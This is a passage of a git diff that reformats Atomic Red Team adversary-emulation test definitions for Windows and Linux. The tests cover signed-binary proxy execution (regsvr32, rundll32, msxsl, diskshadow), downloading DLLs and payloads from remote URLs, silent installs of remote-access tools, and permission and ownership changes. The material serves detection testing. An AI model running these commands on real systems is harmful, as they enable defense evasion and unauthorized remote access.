PathToAtomicsFolder\T1218.010\src\RegSvr32.sct regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe dependency_executor_name: powershell dependencies: @@ -44,15 +44,15 @@ atomic_tests: input_arguments: url: description: URL to hosted sct file - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe executor: command: | @@ -68,15 +68,15 @@ atomic_tests: input_arguments: dll_name: description: Name of DLL to Execute, DLL Should export DllRegisterServer - type: Path + type: path default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe dependency_executor_name: powershell dependencies: @@ -98,32 +98,32 @@ atomic_tests: Replicating observed Gozi maldoc behavior registering a dll with an altered extension supported_platforms: - - windows + - windows input_arguments: dll_file: description: Path to renamed dll file to be registered - type: Path + type: path default: '%temp%\shell32.jpg' regsvr32path: description: Default location of Regsvr32.exe - type: Path + type: path default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe - dependency_executor_name: command_prompt + dependency_executor_name: command_prompt dependencies: # (optional) - - description: | - Test requires a renamed dll file - prereq_command: | - if exist #{dll_file} ( exit 0 ) else ( exit 1 ) - get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq - copy "C:\Windows\System32\shell32.dll" "#{dll_file}" + - description: | + Test requires a renamed dll file + prereq_command: | + if exist #{dll_file} ( exit 0 ) else ( exit 1 ) + get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq + copy "C:\Windows\System32\shell32.dll" "#{dll_file}" executor: name: command_prompt - elevation_required: false + elevation_required: false command: | #{regsvr32path}\#{regsvr32name} /s #{dll_file} cleanup_command: | @@ -137,15 +137,15 @@ atomic_tests: input_arguments: dll_name: description: Name of DLL to Install - type: String + type: string default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll regsvr32path: description: Default location of Regsvr32.exe - type: String + type: string default: C:\Windows\system32 regsvr32name: description: Default name of Regsvr32.exe - type: String + type: string default: regsvr32.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 718e03bd..9d056759 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -6,14 +6,14 @@ atomic_tests: description: | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/) - + Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed. supported_platforms: - windows input_arguments: file_url: description: location of the payload - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: command: | @@ -32,7 +32,7 @@ atomic_tests: input_arguments: command_to_execute: description: Command for rundll32.exe to execute - type: String + type: string default: calc.exe executor: command: | @@ -49,7 +49,7 @@ atomic_tests: input_arguments: command_to_execute: description: Command for rundll32.exe to execute - type: String + type: string default: calc.exe executor: command: | @@ -66,7 +66,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf dependency_executor_name: powershell dependencies: @@ -93,7 +93,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf dependency_executor_name: powershell dependencies: @@ -119,7 +119,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf dependency_executor_name: powershell dependencies: @@ -145,7 +145,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf dependency_executor_name: powershell dependencies: @@ -167,7 +167,7 @@ atomic_tests: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs - + In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" supported_platforms: - windows @@ -185,7 +185,7 @@ atomic_tests: input_arguments: exe_to_launch: description: Path of the executable to launch - type: Path + type: path default: '%windir%\System32\notepad.exe' executor: command: | @@ -196,27 +196,27 @@ atomic_tests: description: | Rundll32.exe running non-dll supported_platforms: - - windows + - windows input_arguments: input_url: description: Url to download the DLL - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll input_file: description: Non-dll file - type: String + type: string default: C:\Users\$env:username\Downloads\calc.png - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | Non-dll file must exist on disk at specified location - prereq_command: | + prereq_command: | if (Test-Path #{input_file}) {exit 0} else {exit 1} - get_prereq_command: | + get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: powershell - command: | + command: | rundll32.exe #{input_file}, StartW - name: Rundll32 with Ordinal Value auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 @@ -224,54 +224,54 @@ atomic_tests: Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. Upon successful execution, Calc.exe will spawn. supported_platforms: - - windows + - windows input_arguments: input_url: description: Url to download the DLL - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll input_file: description: DLL File - type: String + type: string default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | DLL file must exist on disk at specified location - prereq_command: | + prereq_command: | if (Test-Path #{input_file}) {exit 0} else {exit 1} - get_prereq_command: | + get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: command_prompt - command: | + command: | rundll32.exe #{input_file},#2 - name: Rundll32 with Control_RunDLL auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e description: | Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. supported_platforms: - - windows + - windows input_arguments: input_url: description: Url to download the DLL - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll input_file: description: DLL File - type: String + type: string default: PathToAtomicsFolder\T1047\bin\calc.dll - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | DLL file must exist on disk at specified location - prereq_command: | + prereq_command: | if (Test-Path #{input_file}) {exit 0} else {exit 1} - get_prereq_command: | + get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: command_prompt - command: | + command: | rundll32.exe shell32.dll,Control_RunDLL #{input_file} - name: Rundll32 with desk.cpl auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917 @@ -283,16 +283,15 @@ atomic_tests: - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml) - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml) supported_platforms: - - windows + - windows input_arguments: exe_to_launch: description: Path of the executable to launch - type: Path + type: path default: '%windir%\System32\calc.exe' executor: name: command_prompt - command: | + command: | copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr - cleanup_command: - del not_an_scr.scr + cleanup_command: del not_an_scr.scr diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index b3fd9e6c..e52ca500 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: process_id: description: PID of process receiving injection - type: String + type: string default: "1000" dll_payload: description: DLL to inject - type: Path + type: path default: PathToAtomicsFolder\T1218\src\x64\T1218.dll dependency_executor_name: powershell dependencies: @@ -39,7 +39,7 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute - type: Path + type: path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll dependency_executor_name: powershell dependencies: @@ -65,7 +65,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf dependency_executor_name: powershell dependencies: @@ -85,14 +85,14 @@ atomic_tests: description: | Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. supported_platforms: - - windows + - windows input_arguments: remote_url: description: url to document - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | Microsoft Word must be installed prereq_command: | @@ -113,28 +113,28 @@ atomic_tests: description: | Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe supported_platforms: - - windows + - windows input_arguments: xml_payload: description: XML to execution - type: Path + type: path default: PathToAtomicsFolder\T1218\src\T1218.xml mwcpath: description: Default location of Microsoft.Workflow.Compiler.exe - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 mwcname: description: Default name of microsoft.workflow.compiler.exe - type: Path + type: path default: microsoft.workflow.compiler.exe - dependency_executor_name: powershell - dependencies: - - description: | - .Net must be installed for this test to work correctly. - prereq_command: | - if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} - get_prereq_command: | - write-host ".Net must be installed for this test to work correctly." + dependency_executor_name: powershell + dependencies: + - description: | + .Net must be installed for this test to work correctly. + prereq_command: | + if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} + get_prereq_command: | + write-host ".Net must be installed for this test to work correctly." executor: command: | #{mwcpath}\#{mwcname} "#{xml_payload}" output.txt @@ -145,33 +145,33 @@ atomic_tests: description: | Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe supported_platforms: - - windows + - windows input_arguments: xml_payload: description: XML to execution - type: Path + type: path default: PathToAtomicsFolder\T1218\src\T1218.xml renamed_binary: description: renamed Microsoft.Workflow.Compiler - type: Path + type: path default: PathToAtomicsFolder\T1218\src\svchost.exe mwcpath: description: Default location of Microsoft.Workflow.Compiler.exe - type: Path + type: path default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319 mwcname: description: Default name of microsoft.workflow.compiler.exe - type: Path + type: path default: microsoft.workflow.compiler.exe - dependency_executor_name: powershell - dependencies: - - description: | - .Net must be installed for this test to work correctly. - prereq_command: | - Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force - if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} - get_prereq_command: | - write-host "you need to rename workflow complier before you run this test" + dependency_executor_name: powershell + dependencies: + - description: | + .Net must be installed for this test to work correctly. + prereq_command: | + Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force + if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} + get_prereq_command: | + write-host "you need to rename workflow complier before you run this test" executor: command: | #{renamed_binary} #{xml_payload} output.txt @@ -185,20 +185,20 @@ atomic_tests: One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe. - + The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. - + Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 supported_platforms: - windows input_arguments: module_name: description: Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. - type: String + type: string default: foo module_path: description: Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. - type: String + type: string default: $PWD dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module. @@ -216,29 +216,29 @@ atomic_tests: description: | Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ supported_platforms: - - windows + - windows input_arguments: txt_payload: description: txt to execute - type: Path + type: path default: PathToAtomicsFolder\T1218\src\T1218.txt dspath: description: Default location of DiskShadow.exe - type: Path + type: path default: C:\Windows\System32\diskshadow.exe - dependency_executor_name: powershell - dependencies: - - description: txt file must exist on disk at specified location (#{txt_payload}) - prereq_command: | - if (Test-Path #{txt_payload}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}" - - description: DiskShadow.exe must exist on disk at specified location (#{dspath}) - prereq_command: | - if (Test-Path #{dspath}) {exit 0} else {exit 1} - get_prereq_command: | - echo "DiskShadow.exe not found on disk at expected location" + dependency_executor_name: powershell + dependencies: + - description: txt file must exist on disk at specified location (#{txt_payload}) + prereq_command: | + if (Test-Path #{txt_payload}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}" + - description: DiskShadow.exe must exist on disk at specified location (#{dspath}) + prereq_command: | + if (Test-Path #{dspath}) {exit 0} else {exit 1} + get_prereq_command: | + echo "DiskShadow.exe not found on disk at expected location" executor: command: | #{dspath} -S #{txt_payload} @@ -254,7 +254,7 @@ atomic_tests: input_arguments: arbitrary_dll: description: Path of DLL to be loaded - type: String + type: string default: PathToAtomicsFolder\T1218\bin\calc.dll dependency_executor_name: powershell dependencies: @@ -270,7 +270,7 @@ atomic_tests: wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer cleanup_command: |- taskkill /f /im calculator.exe > nul 2>&1 - name: command_prompt + name: command_prompt - name: Lolbin Gpscript logon option auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c description: | @@ -278,7 +278,7 @@ atomic_tests: https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ supported_platforms: - - windows + - windows executor: command: | Gpscript /logon @@ -290,7 +290,7 @@ atomic_tests: https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ supported_platforms: - - windows + - windows executor: command: | Gpscript /startup @@ -303,15 +303,15 @@ atomic_tests: Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ supported_platforms: - - windows + - windows input_arguments: Path_inf: - description: Path to the cab file - type: Path - default: PathToAtomicsFolder\T1218\src\ieuinit.inf + description: Path to the cab file + type: path + default: PathToAtomicsFolder\T1218\src\ieuinit.inf Path_ie4uinit: description: Path to ie4uinit.exe - type: Path + type: path default: c:\windows\system32\ie4uinit.exe executor: command: | diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index a96b1460..73c6caa9 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -82,7 +82,7 @@ atomic_tests: $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi" Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi" msiexec /i $installer /qn - cleanup_command: | + cleanup_command: | $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi" msiexec /x $installer /qn name: powershell @@ -97,7 +97,7 @@ atomic_tests: input_arguments: Ammyy_Admin_Path: description: Path of Ammyy Admin executable - type: Path + type: path default: $env:temp\ammyy.exe dependency_executor_name: powershell dependencies: @@ -110,10 +110,10 @@ atomic_tests: executor: command: | Start-Process #{Ammyy_Admin_Path} - cleanup_command: | + cleanup_command: | Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true - name: RemotePC Software Execution auto_generated_guid: fbff3f1f-b0bf-448e-840f-7e1687affdce description: | @@ -124,7 +124,7 @@ atomic_tests: input_arguments: RemotePC_Path: description: Path of RemotePC executable - type: Path + type: path default: $env:temp\RemotePC.exe dependency_executor_name: powershell dependencies: @@ -137,7 +137,7 @@ atomic_tests: executor: command: | Start-Process #{RemotePC_Path} - cleanup_command: | + cleanup_command: | Unregister-ScheduledTask -TaskName "RemotePC" -Confirm:$False -ErrorAction SilentlyContinue Unregister-ScheduledTask -TaskName "RPCServiceHealthCheck" -Confirm:$False -ErrorAction SilentlyContinue Unregister-ScheduledTask -TaskName "ServiceMonitor" -Confirm:$False -ErrorAction SilentlyContinue @@ -149,7 +149,7 @@ atomic_tests: Stop-Process -Name "RemotePCService" -force -erroraction silentlycontinue Stop-Process -Name "RPCService" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true - name: NetSupport - RAT Execution auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75 description: | @@ -158,8 +158,8 @@ atomic_tests: - windows input_arguments: NetSupport_Path: - description: Path to the NetSupport executable. - type: Path + description: Path to the NetSupport executable. + type: path default: $env:temp\T1219_NetSupport.exe dependency_executor_name: powershell dependencies: @@ -172,20 +172,20 @@ atomic_tests: executor: command: | Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn" - cleanup_command: | + cleanup_command: | Stop-Process -Name "client32" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true - name: UltraViewer - RAT Execution auto_generated_guid: 19acf63b-55c4-4b6a-8552-00a8865105c8 description: | - A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services. + A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services. supported_platforms: - windows input_arguments: UltraViewer_Path: - description: Path to the UltraViewer executable. - type: Path + description: Path to the UltraViewer executable. + type: path default: $env:temp\T1219_UltraViewer.exe dependency_executor_name: powershell dependencies: @@ -199,10 +199,10 @@ atomic_tests: command: | Start-Process -Wait -FilePath "#{UltraViewer_Path}" -Argument "/silent" -PassThru Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe' - cleanup_command: | + cleanup_command: | Stop-Process -Name "UltraViewer_Desktop" -Force -ErrorAction SilentlyContinue name: powershell - elevation_required: True + elevation_required: true - name: UltraVNC Execution auto_generated_guid: 42e51815-a6cc-4c75-b970-3f0ff54b610e description: | @@ -213,7 +213,7 @@ atomic_tests: input_arguments: UltraVNC_Viewer_Path: description: Path of UltraVNC Viewer executable - type: Path + type: path default: $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe' dependency_executor_name: powershell dependencies: @@ -222,12 +222,12 @@ atomic_tests: prereq_command: | if (Test-Path #{UltraVNC_Viewer_Path}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -Destination $env:temp\vncsetup.exe -dynamic - start-process $env:temp\vncsetup.exe /silent + Start-BitsTransfer -Source "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -Destination $env:temp\vncsetup.exe -dynamic + start-process $env:temp\vncsetup.exe /silent executor: command: | Start-Process #{UltraVNC_Viewer_Path} cleanup_command: | Stop-Process -Name "vncviewer" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 84c442e4..18e8357c 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -13,15 +13,15 @@ atomic_tests: input_arguments: xmlfile: description: Location of the test XML file on the local filesystem. - type: Path + type: path default: PathToAtomicsFolder\T1220\src\msxslxmlfile.xml xslfile: description: Location of the test XSL script file on the local filesystem. - type: Path + type: path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl msxsl_exe: description: Location of the MSXSL executable. - type: Path + type: path default: PathToAtomicsFolder\T1220\bin\msxsl.exe dependency_executor_name: powershell dependencies: @@ -48,7 +48,7 @@ atomic_tests: executor: command: | #{msxsl_exe} #{xmlfile} #{xslfile} - cleanup_command: | + cleanup_command: | del #{msxsl_exe} >nul 2>&1 name: command_prompt - name: MSXSL Bypass using remote files @@ -63,15 +63,15 @@ atomic_tests: input_arguments: xmlfile: description: Remote location (URL) of the test XML file. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml xslfile: description: Remote location (URL) of the test XSL script file. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl msxsl_exe: description: Location of the MSXSL executable. - type: Path + type: path default: PathToAtomicsFolder\T1220\bin\msxsl.exe dependency_executor_name: powershell dependencies: @@ -84,7 +84,7 @@ atomic_tests: executor: command: | #{msxsl_exe} #{xmlfile} #{xslfile} - cleanup_command: | + cleanup_command: | del -Path #{msxsl_exe} >nul 2>&1 name: command_prompt - name: WMIC bypass using local XSL file @@ -96,11 +96,11 @@ atomic_tests: input_arguments: wmic_command: description: WMI command to execute using wmic.exe - type: String + type: string default: process list local_xsl_file: description: Location of the test XSL script file on the local filesystem. - type: Path + type: path default: PathToAtomicsFolder\T1220\src\wmicscript.xsl dependency_executor_name: powershell dependencies: @@ -124,11 +124,11 @@ atomic_tests: input_arguments: remote_xsl_file: description: Remote location of an XSL payload. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl wmic_command: description: WMI command to execute using wmic.exe - type: String + type: string default: process list executor: command: | diff --git a/atomics/T1221/T1221.yaml b/atomics/T1221/T1221.yaml index 3c554c5f..3e90c35f 100644 --- a/atomics/T1221/T1221.yaml +++ b/atomics/T1221/T1221.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: docx_file: description: Location of the test docx file on the local filesystem. - type: Path + type: path default: PathToAtomicsFolder\T1221\src\Calculator.docx dependency_executor_name: powershell dependencies: diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml index d8dfe3d5..8a72e29a 100644 --- a/atomics/T1222.001/T1222.001.yaml +++ b/atomics/T1222.001/T1222.001.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: file_folder_to_own: description: Path of the file or folder for takeown to take ownership. - type: Path + type: path default: '%temp%\T1222.001_takeown_folder' dependency_executor_name: command_prompt dependencies: @@ -38,11 +38,11 @@ atomic_tests: input_arguments: file_or_folder: description: Path of the file or folder to change permissions. - type: Path + type: path default: '%temp%\T1222.001_cacls' user_or_group: description: User or group to allow full control - type: String + type: string default: Everyone dependency_executor_name: command_prompt dependencies: @@ -68,7 +68,7 @@ atomic_tests: input_arguments: file_or_folder: description: Path of the file or folder remove attribute. - type: Path + type: path default: '%temp%\T1222.001_attrib' dependency_executor_name: command_prompt dependencies: @@ -96,7 +96,7 @@ atomic_tests: input_arguments: file_or_folder: description: Path of the files to hide. - type: Path + type: path default: '%temp%\T1222.001_attrib_2' executor: command: | @@ -120,11 +120,11 @@ atomic_tests: input_arguments: path: description: Path of folder to recursively set permissions on - type: Path + type: path default: 'C:\Users\Public\*' file_path: description: Path of folder permission back - type: Path + type: path default: '%temp%\T1222.001-folder-perms-backup.txt' dependency_executor_name: command_prompt dependencies: @@ -139,4 +139,4 @@ atomic_tests: cleanup_command: | icacls '#{path}' /restore #{file_path} /q >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1222.002/T1222.002.yaml b/atomics/T1222.002/T1222.002.yaml index f0686088..e325170c 100644 --- a/atomics/T1222.002/T1222.002.yaml +++ b/atomics/T1222.002/T1222.002.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: numeric_mode: description: Specified numeric mode value - type: Integer + type: integer default: 755 file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -31,11 +31,11 @@ atomic_tests: input_arguments: symbolic_mode: description: Specified symbolic mode value - type: String + type: string default: a+w file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -51,11 +51,11 @@ atomic_tests: input_arguments: numeric_mode: description: Specified numeric mode value - type: Integer + type: integer default: 755 file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -71,11 +71,11 @@ atomic_tests: input_arguments: symbolic_mode: description: Specified symbolic mode value - type: String + type: string default: a+w file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -91,15 +91,15 @@ atomic_tests: input_arguments: owner: description: Username of desired owner - type: String + type: string default: root file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml group: description: Group name of desired group - type: String + type: string default: root executor: command: | @@ -115,15 +115,15 @@ atomic_tests: input_arguments: owner: description: Username of desired owner - type: String + type: string default: root file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 group: description: Group name of desired group - type: String + type: string default: root executor: command: | @@ -139,11 +139,11 @@ atomic_tests: input_arguments: owner: description: Username of desired owner - type: String + type: string default: root file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml executor: command: | @@ -159,11 +159,11 @@ atomic_tests: input_arguments: owner: description: Username of desired owner - type: String + type: string default: root file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -180,7 +180,7 @@ atomic_tests: input_arguments: file_to_modify: description: Path of the file - type: Path + type: path default: /var/spool/cron/root executor: command: | @@ -196,23 +196,23 @@ atomic_tests: input_arguments: source_file: description: Path of c source file - type: Path + type: path default: PathToAtomicsFolder/T1222.002/src/T1222.002.c compiled_file: description: Path of compiled file - type: Path + type: path default: /tmp/T1222002 dependency_executor_name: sh dependencies: - description: | - Compile the script from (#{source_file}). Destination is #{compiled_file} + Compile the script from (#{source_file}). Destination is #{compiled_file} prereq_command: | - gcc #{source_file} -o #{compiled_file} + gcc #{source_file} -o #{compiled_file} get_prereq_command: | - gcc #{source_file} -o #{compiled_file} + gcc #{source_file} -o #{compiled_file} executor: command: | - #{compiled_file} /tmp/ T1222002 + #{compiled_file} /tmp/ T1222002 name: sh - name: Chown through c script auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389 @@ -224,22 +224,22 @@ atomic_tests: input_arguments: source_file: description: Path of c source file - type: Path + type: path default: PathToAtomicsFolder/T1222.002/src/chown.c compiled_file: description: Path of compiled file - type: Path + type: path default: /tmp/T1222002own dependency_executor_name: sh dependencies: - description: | - Compile the script from (#{source_file}). Destination is #{compiled_file} + Compile the script from (#{source_file}). Destination is #{compiled_file} prereq_command: | - gcc #{source_file} -o #{compiled_file} + gcc #{source_file} -o #{compiled_file} get_prereq_command: | - gcc #{source_file} -o #{compiled_file} + gcc #{source_file} -o #{compiled_file} executor: command: | - sudo #{compiled_file} #{source_file} + sudo #{compiled_file} #{source_file} name: sh elevation_required: true diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml index 6a854918..c45b1389 100644 --- a/atomics/T1482/T1482.yaml +++ b/atomics/T1482/T1482.yaml @@ -64,7 +64,7 @@ atomic_tests: name: powershell - name: Adfind - Enumerate Active Directory OUs auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, 